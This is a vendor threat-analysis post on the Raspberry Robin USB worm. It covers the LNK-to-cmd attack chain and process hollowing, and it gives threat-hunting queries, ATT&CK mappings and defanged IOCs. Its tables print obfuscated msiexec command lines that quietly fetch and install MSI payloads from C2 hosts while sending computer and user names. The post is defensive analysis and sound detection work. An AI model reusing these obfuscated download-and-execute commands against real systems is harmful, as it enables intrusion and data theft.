FortiEDR
FortiEDR automates the protection against advanced threats, pre and post-execution, with real time orchestrated incident response functionality.
ralvarez
Staff
Staff

Introduction

 

Raspberry Robin is a worm transferred via USB drive that connects to primarily external QNAP devices (C2) to download and execute malicious payloads. This worm uses msiexec.exe to connect to its C2 server using an HTTP requests and download and execute malicious msi packages. Activity associated with this worm’s behavior was first publically reported by Red Canary in September 2022 . There is currently no clear indication which group is responsible for the creation or distribution of this worm although its use has been linked to recent SocGholish fake update campaigns earlier this year.

 

Attack Chain

 

raspberryrobin01.png

 Figure 1. Attack chain associated with Raspberry Robin attack detected by FortiGuard Responder team

 

Initial Access and Execution

 

Raspberry Robin typically arrives via an infected USB drive and the main component of the worm appears as an anomalous file on the infected removable device. There has been numerous file extension associated with these files and the filenames appear to be randomly generated. These files themselves are not executables but contain a set of obfuscated cmd commands padded with junk data that is ignored on execution. Alongside this file is a LNK file that executes the content of the main Raspberry Robin file stored in the infected USB drive using cmd.exe with /R parameter. An example of such a command line is shown below where, xyz.usb is an example filename used by Raspberry Robin.:

 

cmd /r c:\windows\system32\cmd.exe < xyz.usb

 

A successful execution of the malicious file runs an msiexec.exe that connects to the C2 server and downloads a malicious DLL. It will also run explorer.exe to display the contents of a folder on the compromised USB device.

 

Raspberry Robin File Contents

 

Each of the observed main Raspberry Robin files contain a huge chunks of random strings as shown below in Figure 2. However, a regular pattern can be found in each of the observed Raspberry Robin files:

  1. A huge block of random strings
  2. msiexec.exe to connect to the C2 server (with mixed random characters and randomized case)
  3. another huge block of random strings
  4. explorer.exe to display a folder (with a randomized case)

raspberryrobin02.png

 Figure 2. Example of typical Raspberry Robin main file content

 

 

Although the C2 servers and the folder name to display varies from file to file, each Raspberry Robin malicious file can be identified based on the pattern above. Also the combination of random characters attached to the msiexec.exe and explorer.exe varies, as does the capitalization in the main strings.

 

Each sample contains the msiexec command that connects to the C2 server. For this sample, the malware connects to the as3[.]biz via port 8080 with ‘%computername%’ and ‘%username%’ as additional parameters. These values will be populated with victim information on execution.

 

When cmd executes the contents of sample01.usb, the random strings will be ignored and the obfuscation in the commands will be simplified. For example, the command ”^StaR^t mS^i^e^X^Ec /q/ihTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%” will normalize to, “start msiexec /q/ihttp://as3[.]biz:8080/vs1cn41zizo/%computername%?%username%”. This simplification can be used to create a cmdline based query if process creation telemetry is collected. In the case of the above sample, the server at as3[.]biz will serve an installer (msi file) that will be used by msiexec.exe. This C2 server also varies from samples to sample although all observed samples references a domain related to a QNAP device.

 

After executing the msiexec another command, ’start explorer “RemovableDisk”’, will be executed to display a folder named “Removable Disk” if it is available. Different variants of Raspberry Robin main file contained different strings referencing various common default names for removable USB drives.

 

Analyzing msiexec command

 

Raspberry Robin uses msiexe.exe to connect to the C2 server to download a malicious msi package. We can see these commands from the malicious files found in the infected drives, and the actual command varies from file to file. Also the addition of random strings to “start msiexec /q /I ” makes it distinct to other malicious files.

 

Below is a list of some combination of the msiexec commands found in different malicious files:

Malicious file hash Obfuscated msiexec commands Normalized versions
503620130e7d59853f7ba2119c9b410f0fe346ec ^StaR^t mS^i^e^X^Ec /q/i"hTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%" start msiexec /q/i"http[:]//as3[.]biz:8080/vs1cn41zizo/%computername%?%username%"
5506fc14acac1dc841abff2b972c972f3f1722ec sT^ar^T ms^I^e^X^ec /Q /i"htTp://eJ3[.]xyZ:8080/xj92YfGKOB/%COmPUTeRNAmE%?%UseRName%" start msiexec /q /i"http[:]//ej3[.]xyz:8080/xj92yfgkob/%computername%?%username%"
D92379ee6065391d06cb218dd0d713aa0e7b7942 st^a^RT m^S^i^E^XeC ^h^L^x^kG^OA^aJ=cG^b^vK^W ^N^c^gBQ^j^YE^q=pS^r^t^t^Y^eG ^sW^aI^BH=^uD^o /Q ^Hp^yxy=^qxP ^bWiW^Uxi=ioA^Z^O -^f^v "http://5jb[.]Me:8080/yyyOd4/bXXDil5hPAU4EHelvZzFJewbWXUu0/xVKlBoCc/%ComputeRNaME%?%USeRnAMe%" start msiexec /q -fv "http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc/%computername%?%username%"
008945cc473304fe2ad7aa4af6b14a120e6703b2 St%fFFyTpReitUHj%a^RT%ffFytPREiTUhj% %FFFyTpReituhj%M^s^ie%fffyTPreiTUHJ%X^EC ^E^WjZ^L=Z^y^UQ^T^n^F^x ^vHe^t^H=ENa^p^h^n ^e^ry^ZIN=G^g /Q ^rv=^H^u^Bi f^oH^YML^wn=^H^kLtj^u^u ^I^G^v^sxI=ld^uK^kL^aN^U /^I"HttP://W4[.]nz:8080/A/rB/ZQ3N3i36PkkKgOuu6K/%compUTErnAme%=%useRNaMe%" start msiexec /q /i"http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k/%computername%=%username%"

Table 1. List of some combinations of msiexec commands found in different malicious samples

 

The msiexec parameter /q (short for /quiet) specifies quiet mode, which means there's no user interaction required. While /i parameter specifies normal installation.

 

Post Exploitation – HTTP Request

 

FortiEDR captures information related to the execution of msiexec.exe when it connects to the C2 server using the threat hunting query,

 

Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")

 

Another threat hunting query can show us the HTTP request with port 8080 parameter in the URL executed by msiexec.exe:

 

Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")

 

Figure 3 below shows the details of one of the results of the query above. It shows details of an HTTP request including the actual C2 server. This query works on every HTTP request that has port 8080 parameter in its URL.

raspberryrobin03.png

 Figure 3. Details on one of the results of the threat hunting query mentioned above

 

START EXPLORER

 

Similar to the msiexec command, “start explorer ” is mixed with random strings found in different malicious files. Raspberry Robin uses explorer to display a folder with the specified name. If the folder with the specified name exists, the folder will be open, otherwise the default folder will be displayed. It is likely that these commands are included so that when the user clicks on the LNK file, the correct folder opens which matches expected behavior and prevents the user from suspecting that something suspicious has occurred.

 

The table below lists different “start explorer ” found in a number of analyzed samples:

Malicious file hash Obfuscated explorer commands Normalized versions
503620130e7d59853f7ba2119c9b410f0fe346ec ^s^t^a^r^t ^e^x^P^l^orE^R "Removable Disk" start explorer "removable disk"
5506fc14acac1dc841abff2b972c972f3f1722ec S^TA^rT ^E^xPl^o^R^e^r "USB Drive" start explorer "usb drive"
D92379ee6065391d06cb218dd0d713aa0e7b7942 S^t^aRt ex^PL^o^rE^R "ETIENNE II" start explorer "etienne ii"
008945cc473304fe2ad7aa4af6b14a120e6703b2 St%ffFYtPreituHj%a^Rt%FffytPReITUhj% %FfFytPreitUHJ%e%FfFYtPReiTUhJ%X %fffytPrEituHj%P^lO%FFfYTpReITUhJ%R %ffFYtpReITuHj%e^R %fFfYtPrEiTuHj% v^IN^o^d start explorer vinod

Table 2. List of some combinations of explorer commands found in different malicious samples

 

Recent Attacks

 

Recently, we have seen new Raspberry Robin samples on endpoints protected by FortiEDR. In one of the analyzed incidents (see Figure 4 below) a USB drive was identified containing an LNK and an ICO file. The user clicked the LNK file which called a cmd process to execute contents of the ‘Fn.ICO’ file containing the Raspberry Robin commands. As described in the previous section the ‘Fn.ICO file’ contains a number of simple commands used to downloads and execute a malicious msi package from a C2 server. In this case the contacted domain was ‘u0[.]rS’. The complete msiexec command below (defanged):

 

msiexec.exe /qN -I "hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/<computername>?<username>"

 

We can see in Figure 4 below the execution of the LNK file leading to the connectivity to its C2 server. When a user clicks on the LNK file, FortiEDR identifies explorer.exe executing cmd.exe (expected LNK file process chain). The execution of LNK triggers another cmd.exe process, that now runs a series of msiexec.exe processes that download an installer from the C2 server ‘u0[.]rS’. In this event the malicious msiexec.exe process creates a suspended instance of the dllhost.exe process (standard Windows binary) which is subsequently hollowed with a malicious payload and the process resumed.

 

Process hollowing is a procedure where a process is started in the suspended state then it’s in-memory code is overwritten and replaced with different (often malicious) code. This technique can be used to hide malicious code within a whitelisted process. Process hollowing is also a way to execute a new executable without creating a new file as malicious code is written directly into memory rather than touching disk. When the hollowed process was resumes, the code injected into the dllhost.exe process then connects to a second stage C2 server, 199[.]249[.]230[.]115.

raspberryrobin04.png

 Figure 4. FortiEDR blocks Raspberry Robin’s connection attempt to its C2 server

 

In the attack analyzed above the affected customer did not have process hollowing protections in place but FortiEDR blocked the C2 connection attempts preventing the hollowed implant from effectively communicating with C2. FortiEDR has rules out of the box to prevent this process hollowing behavior and can be configured to remove hollowed implants using automated playbooks.

 

Using the Fortinet Central Threat System (CTS) shown in Figure 5, we can see that the IP address 199[.]249[.]230[.]115, is tagged as a Tor exit node. Tor is short for ‘The Onion Router’, and is a free and open-source network for anonymous communication. The Tor network is typically used for anonymous communication and is one way for threat actors to hide their C2. Unless there is a business need, it is recommended that customers block all communications too and from Tor exit nodes in corporate environments where possible. You can follow CISA guidance related to protecting against Tor access too and from your network at the following advisory: https://www.cisa.gov/uscert/sites/default/files/publications/AA20-183A_Defending_Against_Malicious_C...

raspberryrobin05.png

 Figure 5. Fortinet Central Threat Service (CTS) identifies 199[.]249[.]230[.]115 as a Tor exit node

 

The behavior analyzed above was just one of many observed Raspberry Robin infections detected and blocked by FortiEDR. The FortiGuard MDR team also identified different variants that also performed process hollowing targeting dllhost.exe, rundll32.exe and regsvr32.exe. Defenders using telemetry based monitoring should also look for anomalous network connections from these three executables where the parent process is msiexec if a tool capable of detecting process hollowing is not available.

 

Conclusion

 

The continued prevalence of Raspberry Robin highlights the need for organisations to continue to monitor the use of USB devices within their networks. It also highlights the need to consider the USB worm as a potential attack vector despite it being less common than the typical phishing or direct access initial access methods we see in more prevalent threats. In the instance that this type of worm is used to transfer a malicious payload into a FortiEDR protected environment, FortiEDR is positioned to continue to provide on-going protection from post-exploitation activity.

 

FortiEDR Threat Hunting telemetry can also be used to build additional detection methods to more quickly attribute observed activity to potential Raspberry Robin activity to expedite analyst triage. Threat Hunting queries designed to assist with detecting Raspberry Robin activity are shown below as are MITRE ATT&CK techniques involved with this activity and related observables, and IOCs related to observed activity.

 

Threat Hunting

 

This query will return all process creation events for msiexec.exe where the command line parameters include ‘/q /i', which indicates that the msiexec is quietly installing a msi package, and the command line parameters ‘http’ and ‘8080’ that can be indicators that the command is being used to access a remote msi package. There may be false positives if software used in a monitored environment that uses msiexec to install remote msi packages as part of updates but none were observed during testing:

Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")

 

This query will return all http request events for msiexec.exe where the URL contains port 8080. It is a more generic version of the above query. As with the previous query, there may be false positives if software used in a monitored environment that uses msiexec to install remote msi packages as part of updates but none were observed during testing:

Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")

 

This query will return all process creation event for dllhost.exe, rundll32.exe and regsvr32.exe processes spawned by msiexec.exe processes that have command line arguments consistent with the behavior of Raspberry Robin samples observed by the FortiGuard MDR team. As with the previous query, there may be false positives if software used in a monitored environment that uses msiexec to install remote msi packages as part of updates but none were observed during testing:

Type:"Process Creation" AND Source.Process.Name:"msiexec.exe:" AND Source.Process.CommandLine: ("\/q\/i" AND "http" AND "\:8080") AND Target.Process.Name:("dllhost.exe" OR "rundll32.exe" OR "regsvr32.exe")

 

This query will detect thread created events where the source process is msiexec.exe and the child process is one of the processes targeted with process hollowing in Raspberry Robin activity observed by the FortiGuard MDR team. There are no expected false positives associated with this activity:

Type:"Thread Created" AND Source.Process.Name:"msiexec.exe" AND Target.Process.Name:("dllhost.exe" OR "rundll32.exe" OR "regsvr32.exe")

 

MITRE ATT&CK

 

TA0001 – Initial Access

 

Technique ID

Technique Description

Observed Activity

T1091

Replication Through Removable Media

Raspberry Robin activity analysed as part of this article is executed via compromised USB drive. As of now, we don’t know yet how the USB drives are getting infected.

 

TA0008 – Lateral Movement

 

Technique ID

Technique Description

Observed Activity

T1091

Replication Through Removable Media

Raspberry Robin activity analysed as part of this article is executed via compromised USB drive. As of now, we don’t know yet how the USB drives are getting infected.

 

T1059 - Execution

 

Technique ID

Technique Description

Observed Activity

T1204.002

User Execution: Malicious File

Raspberry Robin has relied upon users clicking on a malicious LNK file in a compromised USB drive.

 

Technique ID

Technique Description

Observed Activity

T1059.003

Command and Scripting Interpreter: Windows Command Shell

Raspberry Robin includes the use of LNK execution to run cmd.exe to execute a set of commands stored in a file found in the USB drive. Due to LNK execution the parent process of cmd.exe will always be explorer.exe.

 

TA0005 - Defense Evasion

 

Technique ID

Technique Description

Observed Activity

T1218.009

System Binary Proxy Execution: msiexec.exe

Raspberry Robin uses msiexec.exe to download and run a malicious installer. Msiexec.exe is called from a cmd.exe process as part of LNK execution and includes a URL as part of the command line arguments.

 

Technique ID

Technique Description

Observed Activity

T1055.012

Process Injection: Process Hollowing

Raspberry Robin uses process hollowing to embed its final payload into a separate process. Variants observed by the FortiGuard MDR team have targeted dllhost.exe, rundll32.exe and regsvr32.exe processes. The hollowed processes were spawned by the msiexec.exe process.

 

Technique ID

Technique Description

Observed Activity

T1027

Obfuscated Files or Information

Raspberry Robin executes commands stored in a file in the USB drive. It contains obfuscated msiexec.exe and explorer commands that includes randomized strings.

 

TA0011 – Command and Control

 

Technique ID

Technique Description

Observed Activity

T1071.001

Application Layer Protocol: Web Protocols

Raspberry Robin tries to download a malicious installer from its C2 server via web request from the msiexec.exe process (legitimate msiexec functionality). Once the installer has executed and created a hollowed process (dllhost.exe, rundll32.exe, regsvr32.exe) with an injected payload, the payload will also attempt to connect to its C2 server via web requests to the Tor network.

 

 

IOCs

 

Indicator Description

Indicator

Indicator Type

Associated Tactic

Notes

First Observed

Raspberry Robin sample

503620130e7d59853f7ba2119c9b410f0fe346ec

SHA1 Hash

Installation

Raspberry Robin sample that tries to connect to aS3[.]Biz

2022-05-09

Raspberry Robin sample

5506fc14acac1dc841abff2b972c972f3f1722ec

SHA1 Hash

Installation

Raspberry Robin sample that tries to connect to eJ3[.]xyZ

2022-05-30

Raspberry Robin sample

D92379ee6065391d06cb218dd0d713aa0e7b7942

SHA1 Hash

Installation

Raspberry Robin sample that tries to connect to 5jb[.]Me

2022-08-01

Raspberry Robin sample

008945cc473304fe2ad7aa4af6b14a120e6703b2

SHA1 Hash

Installation

Raspberry Robin sample that tries to connect to w4[.]nz

2022-08-06

MSI file

3b552f77179299d3a3df06b3f687eb91013d46bb

SHA1 Hash

Installation

MSI sample downloaded from Raspberry Robin’s C2 server such as w4[.]nz

2022-07-03

DLL file

bfcfa72ba5095fba108314c1c4deb5faed82ef4d

SHA1 Hash

Installation

DLL file packaged within the MSI file downloaded by Raspberry Robin

2022-01-20

Malicious URL

http[:]//as3[.]biz:8080/vs1cn41zizo

URL

Installation

Raspberry Robin C2 URL to download a malicious installer

2022-05-09

Malicious URL

http[:]//ej3[.]xyz:8080/xj92yfgkob

URL

Installation

Raspberry Robin C2 URL to download a malicious installer

2022-05-30

Malicious URL

http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc

URL

Installation

Raspberry Robin C2 URL to download a malicious installer

2022-08-01

Malicious URL

http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k

URL

Installation

Raspberry Robin C2 URL to download a malicious installer

2022-08-06

Malicious URL

hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/

URL

Installation

Raspberry Robin C2 URL to download a malicious installer

2022-014

IP Address

185[.]146[.]232[.]191

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

212[.]186[.]71[.]38

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

45[.]128[.]133[.]206

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

188[.]165[.]26[.]89

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

185[.]165[.]168[.]77

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

198[.]50[.]238[.]128

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

198[.]98[.]59[.]243

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

74[.]208[.]203[.]175

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

IP Address

199[.]249[.]230[.]115

IP Address

C2

Raspberry Robin C2 using tor exit node

2022-09-14

Contributors